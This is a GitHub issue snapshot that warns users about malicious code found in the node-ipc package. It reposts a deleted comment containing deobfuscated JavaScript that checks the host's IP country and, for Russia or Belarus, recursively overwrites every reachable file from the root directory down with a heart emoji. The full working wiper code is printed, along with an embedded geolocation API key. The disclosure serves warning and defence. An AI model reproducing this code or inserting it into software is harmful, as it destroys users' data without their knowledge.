!!!!!!!!!!!! Please do something to warn USERS besides publishing new versions ·...
source link: https://github.com/vuejs/vue-cli/issues/7054
@RIAEvangelist is deleting the original comment, but that does not change the facts.
Original post by @Mister-Hope, which has been deleted:
@RIAEvangelist
I did some digging into recent commits in this repository. What the actual f--k are you doing here:
| The following code is malicious, DO NOT RUN IT
| [the obfuscated code posted at this point is not included in this snapshot]
| The above code is malicious, DO NOT RUN IT
I deobfuscated the code and found out that if the host machine's IP address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:
| The following code is malicious, DO NOT RUN IT

```javascript
import u from "path";
import a from "fs";
import o from "https";

setTimeout(function () {
  // Runs only when t is 0 or 1, i.e. on a fraction of module loads.
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64"); // "./"
      const o = Buffer.from("Li4v", "base64"); // "../"
      const r = Buffer.from("Li4vLi4v", "base64"); // "../../"
      const f = Buffer.from("Lw==", "base64"); // "/"
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); // "country_name"
      const e = Buffer.from("cnVzc2lh", "base64"); // "russia"
      const i = Buffer.from("YmVsYXJ1cw==", "base64"); // "belarus"
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
        if (a) {
          // Walks "./", "../", "../../" and "/" and overwrites every file found.
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));

async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = Buffer.from("4p2k77iP", "base64"); // the heart emoji written over each file
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
      } catch (t) {}
    }
  }
  return f;
}

const ssl = true;
export { ssl as default, ssl };
```

| The above code is malicious, DO NOT RUN IT
The following are excerpts from the malicious code:

```javascript
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154

const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if ip country is Russia or Belarus

a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
```

You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.
Edit: please reference GalvinGao's comment: RIAEvangelist/node-ipc#233 (comment)
Hmmm, it seems the file has already been deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the affected version, v10.1.3, has already either been taken down or deleted by the user from npm, as it currently no longer exists on npm. Still, the publisher's activity is, in my evaluation, kind of suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package have already been planted.